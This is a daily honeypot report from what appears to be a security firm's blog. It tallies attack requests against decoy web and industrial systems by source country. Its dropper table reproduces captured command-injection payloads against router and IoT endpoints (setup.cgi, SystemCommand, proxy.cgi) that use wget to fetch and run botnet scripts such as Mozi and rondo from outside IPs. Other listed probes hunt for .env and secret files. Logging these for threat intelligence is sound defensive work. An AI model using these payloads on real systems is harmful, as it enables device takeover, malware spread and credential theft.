Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-08-23

·474 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-08-23
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 5 stage 1 IP address(es), linked to 5 dropper URL(s).

There are 45 new requests that have never been observed before (these were added to the monitored request database.).

A total of 836 requests were recorded during the day, originating from 5 different countries, with a peak of 418 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
GBGermany
USDubai
GBDubai

botnet_dropper_behaviour
#

remote_addrrequest
156.192.180.249GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1
45.156.87.165GET /proxy.cgi?chk&url=%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.hsg.sh%7Csh%3B HTTP/1.1
45.156.87.165GET /goform/SystemCommand?command=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.qyz.sh%7Csh HTTP/1.1
120.86.255.9GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
122.97.209.152GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://102.33.10.58:51278/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
183POST /goform/SystemCommand HTTP/1.1
1652GET /poc/system/serviceInfo.json?v=1 HTTP/1.1
1682CONNECT 196.251.66.3:80 HTTP/1.0
1742\x04\x01\x00P\xC4\xFBB\x03\x00
2161GET /config/.env.staging HTTP/1.1
2171GET /config/.env.testing HTTP/1.1
2181GET /config/.env.example HTTP/1.1
2211GET /config/.env.template HTTP/1.1
2221GET /config/.env.sample HTTP/1.1
2231GET /config/.env.tmp HTTP/1.1
2261GET /src/config/.env HTTP/1.1
2271GET /src/env/.env HTTP/1.1
2341GET /temp/env/.env HTTP/1.1
2451GET /laravel/.env.example HTTP/1.1
2461GET /laravel/config/.env HTTP/1.1
2471GET /laravel/storage/.env HTTP/1.1
2491GET /django/settings/.env HTTP/1.1
2501GET /django/config/.env HTTP/1.1
2531GET /rails/config/.env HTTP/1.1
2541GET /php/.env HTTP/1.1
2551GET /www/config/.env HTTP/1.1
2591GET /k8s/secrets.env HTTP/1.1
2651GET /.env.pipeline HTTP/1.1
2681GET /github/workflows/.env HTTP/1.1
2691GET /gitlab-ci/.env HTTP/1.1
2721GET /etc/environment HTTP/1.1
2731GET /etc/secrets/.env HTTP/1.1
2741GET /usr/local/etc/.env HTTP/1.1
2751GET /usr/local/etc/config/.env HTTP/1.1
2801GET /config/secrets/.env HTTP/1.1
2891GET /.env-vars HTTP/1.1
2901GET /.app-env HTTP/1.1
2931GET /.dev-env HTTP/1.1
2941GET /myplms/public HTTP/1.1
2951GET /api/myplms/public HTTP/1.1
2961GET /api/myplms/auth/login HTTP/1.1
2971GET /api/myplms/users HTTP/1.1
2981GET /api/myplms/courses HTTP/1.1
2991GET /api/myplms/settings/info.php HTTP/1.1
3001GET /phpunit.xml HTTP/1.1
3011GET /supervisor-example.conf HTTP/1.1
3121GET /.env.lock HTTP/1.1
3741GET /.blog HTTP/1.1
3811GET http://www.serv00.com HTTP/1.1
3821HEAD http://www.serv00.com HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0418GB
1158NL
279BG
362US
431ZA
514SC
614DE
79KR
86UA
96RU
106JP
116SG
126TR
135LT
144IR
152CN
162PT
172HK
181ES
191BR
201EG
211BE
221FR
231SE

Related

Report: 2025-08-22
·397 words
Repport Daily
Report: 2025-08-21
·4037 words
Repport Daily
Report: 2025-08-20
·1308 words
Repport Daily